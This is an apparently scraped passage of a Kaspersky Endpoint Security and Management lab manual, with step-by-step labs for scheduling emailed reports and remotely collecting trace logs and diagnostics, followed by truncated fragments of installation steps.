Create a report
sending task: Click
Add
Select Kaspersky
Security Center 13 on
the list of applications
Select the Deliver
reports task type
Name the task Deliver
reports
Click Next
Select the following

reports:
— Weekly report on
most heavily
infected devices
— Network attack
report
— Anti-virus
database
usage report
KL 002.11.6: Lab 20.
Specify the delivery

method: Send
reports by email
Click Settings
In the Email address

field, type
administrator@abc.lab
Click OK
31. Click Next

KL 002.11.6: Lab 20.
Click Next
Clear the checkbox

Open task details
when creation is
complete
Click Finish
Click the Deliver

reports link
Switch to the
Schedule tab
Set the emailing
interval to Weekly
Select Monday and
9am, then click Save
You have deleted unused reports, and now you will be able to find the necessary ones quicker.
KL 002.11.6: Lab 21.
Kaspersky Endpoint Security and Management How to collect diagnostic information
Scenario. Kaspersky Endpoint Security components will not start on a corporate computer, and you’ve failed to
figure out the reasons of the incident. Collect trace logs of Kaspersky Endpoint Security to be sent to the
technical support. Do it remotely from the Administration Console.
Contents. In this lab, you will remotely collect trace logs from a computer.
Find the Alex-Desktop computer in the console and start the remote diagnostics utility from its shortcut menu.
In the utility window, enable tracing for Kaspersky Endpoint Security, restart Kaspersky Endpoint Security and
download the logs. Additionally, download information about the computer and Windows logs: Kaspersky Event
Log and System.
Log on to the
abc\Administrator
account with the
password
Ka5per5Ky
Run the MMC
Administration
Console
Go to the Managed
devices node
To find the Alex-
Desktop computer,
run the search utility
from the shortcut
menu of the
Managed devices
node
KL 002.11.6: Lab 21.
Type Alex-Desktop
and click Find now
Make sure that the

Alex-Desktop
computer has
appeared in the
search results
Run the remote
diagnostics utility: On
the computer’s
shortcut menu, select
Custom tools |
Remote diagnostics
Make sure that the

Device box contains
the name of the Alex-
Desktop computer
Connect the utility to
the computer: Click
Sign in
KL 002.11.6: Lab 21.
Enable tracing:
Select Kaspersky
Endpoint Security
for Windows
Click the link Enable
tracing
Leave Tracing Level

500
Select Rotation-
based tracing
Set the Files count
to 2
Specify the
Maximum file size:
20MB
Click OK
KL 002.11.6: Lab 21.
Restart Kaspersky
Endpoint Security:
click the link
Restart application
Wait for Kaspersky
Endpoint Security to
restart. At the bottom
of the window, the
following message
will appear: Operation
completed
successfully
Click the link Disable
tracing
Expand the
Kaspersky
Endpoint Security
for Windows/Trace
files folder
Select the first file on
the list and click the
link Download entire
file
Download other files
from the Trace files
folder in a similar
manner
KL 002.11.6: Lab 21.
Download information
about the computer:
Select the System
Info node
Click the link
Download
System Info
Open the Event log
folder and save the
Kaspersky Event
Log and System log
in a similar manner
Click the link
Download folder in
the lower-left corner
of the window
Make sure that the

folder contains all
the necessary logs
Close the diagnostics

utility
Do not delete the
folder with logs: Click
No
You have downloaded Kaspersky Endpoint Security trace logs and system information from the computer.
Attach these logs to your technical support request.
You can also use the diagnostics utility if you need Network Agent logs, or logs of the update module, or
installation logs, or tracing for the Administration Server.
v.1.6.6

Lab Manual

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Lab Manual

Uploaded by

Copyright:

Available Formats

KL 002.11.6: Kaspersky Endpoint Security and Management.

KL 002.11.6: Kaspersky Endpoint Security and Management.

Lab 1. How to install Kaspersky Security Center .........................................................................................3

Task E: Configure exclusions in the properties of Network Threat Protection................................... 80

The KSC and DC machines must be powered on.

The task is performed on KSC.

Start the Kaspersky Security

3. On the welcome page, click Next

On the following page, make sure

Accept the License Agreement

Select Standard installation and

Select Install both Administration

Keep the option Fewer than 100

Select Microsoft SQL Server

Select the KSC\SQLEXPRESS

To proceed with the installation of

Select Microsoft Windows

To begin the installation, click

As soon as KSC Administration

On the welcome page, click Next

Accept the license agreement

Do not change the destination

Specify the connection address:

Make sure that port 8080

Leave these settings unchanged

Select Generate new certificate

Make sure that KSC is specified in

To begin the installation, click

Close the Kaspersky Security

Close the Kaspersky Security

The task is performed on KSC.

Start the Google

Enter the username

Skip the tutorial. Click X

On the welcome page of

We will not use a proxy

43. Click Next

50. Click Next

Select the Kaspersky

Agree to use KSN

Select Add key file

Select the checkbox

59. Click Next

60. Click Create then Next

For the Email

Clear the checkbox

Contents. In this lab, we will:

The task is performed on KSC.

Wait for the button

Select the checkboxes

On the side menu,

On the side menu,

Select Do not add

Click Select devices

Without changing the

Click Next without

To specify the name and

Select the checkbox

On the side menu, select

Make sure that the task

Wait for the notification

The task is performed on KSC.

Switch to Discovery &